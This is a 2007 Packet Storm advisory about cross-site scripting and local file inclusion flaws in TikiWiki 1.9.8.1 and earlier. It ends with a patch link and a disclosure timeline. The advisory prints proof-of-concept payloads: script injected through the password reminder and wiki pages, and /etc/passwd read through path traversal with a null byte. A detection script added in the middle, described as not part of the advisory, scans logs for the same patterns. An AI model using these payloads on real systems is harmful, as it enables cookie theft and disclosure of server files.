tikiwiki-xsslfi.txt

2007-10-25T00:00:00
ID PACKETSTORM:60433
Type packetstorm
Reporter L4teral
Modified 2007-10-25T00:00:00

Description

======================================================================  
TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion  
======================================================================  
  
Author: L4teral <l4teral [4t] gmail com>  
Impact: Cross Site Scripting  
Local File Inclusion  
Status: patch available  
  
  
------------------------------  
Affected software description:  
------------------------------  
  
Application: TikiWiki  
Version: <= 1.9.8.1  
Vendor: http://tikiwiki.org  
  
Description:  
TikiWiki (Tiki) is your Groupware/CMS (Content Management System) solution.  
  
  
--------------  
Vulnerability:  
--------------  
  
XSS:  
1. The password reminder page is vulnerable to cross site scripting.  
  
2. Script code can be embedded into wiki-pages.  
  
3. The script db/tiki-db.php is vulnerable to cross site scripting.  
  
LFI:  
4. The script db/tiki-db.php is vulnerable to local file inclusion attacks.  
  
5. The script tiki-imexport_languages.php is vulnerable to local file  
inclusion attacks.  
  
  
------------  
PoC/Exploit:  
------------  
  
XSS:  
1.  
enter in the form: <img src="javascript:alert(document.cookie)">  
  
URL: http://localhost/tikiwiki/tiki-remind_password.php  
POSTDATA: username=%3Cimg+src%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3E  
remind=send+me+my+password  
  
2.  
create wiki page with:  
{img src=javascript:alert(document.cookie) }  
  
3.  
http://localhost/tikiwiki/tiki-index.php?local_php=<script>alert(document.cookie)</script>  
  
LFI:  
4.  
register_globals required:  
http://localhost/tikiwiki/tiki-index.php?error_handler_file=/etc/passwd  
http://localhost/tikiwiki/tiki-index.php?local_php=/etc/passwd  
  
5.  
the feature lang_use_db (use database for translation) must be activated:  
URL: http://localhost/tikiwiki/tiki-imexport_languages.php  
POSTDATA: imp_language=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&import=import  
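As an added example that is not part of this advisory, the check below lets an administrator scan web-server access logs (and captured POST bodies) for the request patterns listed above: the parameters named in this advisory carrying script tags, directory traversal, absolute paths or null bytes. The log lines are constructed for the example; the regular expressions and parameter-to-script mapping are the example's own assumptions, not vendor code.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Value patterns that indicate abuse rather than normal use.
MARKUP = r"<\s*/?\s*(script|img)\b|javascript:"   # XSS payloads (items 1-3)
PATHS = r"\.\./|\x00|^/"                           # traversal, null byte, absolute path (items 4-5)

# Parameters named in the advisory and the pattern that is abusive for each.
WATCHED = {
    "username": re.compile(MARKUP, re.I),                 # tiki-remind_password.php
    "local_php": re.compile(f"{MARKUP}|{PATHS}", re.I),   # tiki-index.php (XSS and LFI)
    "error_handler_file": re.compile(PATHS, re.I),        # tiki-index.php (LFI)
    "imp_language": re.compile(PATHS, re.I),              # tiki-imexport_languages.php (LFI)
}

# Request line inside a Common Log Format entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_params(query):
    """Return (param, decoded value) pairs whose value matches the abusive pattern.
    Works on a URL query string or an x-www-form-urlencoded POST body."""
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if k in WATCHED and WATCHED[k].search(v)]

def scan_line(line):
    """Return (request path, hits) for one CLF line, or None if the line is clean."""
    m = LOG_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hits = suspicious_params(parts.query)
    return (parts.path, hits) if hits else None

def scan_log(text):
    """Return [(line number, (path, hits)), ...] for every suspicious line."""
    results = []
    for n, line in enumerate(text.splitlines(), 1):
        r = scan_line(line)
        if r:
            results.append((n, r))
    return results

# Constructed sample log: one benign request, two GET PoCs from the advisory, one POST.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Oct/2007:10:00:01 +0000] "GET /tikiwiki/tiki-index.php?page=HomePage HTTP/1.1" 200 5120
10.0.0.9 - - [25/Oct/2007:10:00:02 +0000] "GET /tikiwiki/tiki-index.php?local_php=<script>alert(document.cookie)</script> HTTP/1.1" 200 812
10.0.0.9 - - [25/Oct/2007:10:00:03 +0000] "GET /tikiwiki/tiki-index.php?error_handler_file=/etc/passwd HTTP/1.1" 200 1377
10.0.0.9 - - [25/Oct/2007:10:00:04 +0000] "POST /tikiwiki/tiki-imexport_languages.php HTTP/1.1" 200 910
"""

if __name__ == "__main__":
    for n, (path, hits) in scan_log(SAMPLE_LOG):
        print(f"line {n}: {path} {hits}")
    # POST bodies are not in the access log; feed a captured body to the same check.
    print(suspicious_params("imp_language=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&import=import"))
```

The POST request on the last sample line is not flagged from the access log alone, because its body is not logged; capture bodies at a proxy or application level to apply the same check there.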
  
  
---------  
Solution:  
---------  
  
update to 1.9.8.2 or above:  
https://sourceforge.net/project/showfiles.php?group_id=64258&package_id=112134&release_id=549549  
  
---------  
Timeline:  
---------  
  
23.10.2007 - vendor informed  
25.10.2007 - vendor released patch  
25.10.2007 - public disclosure  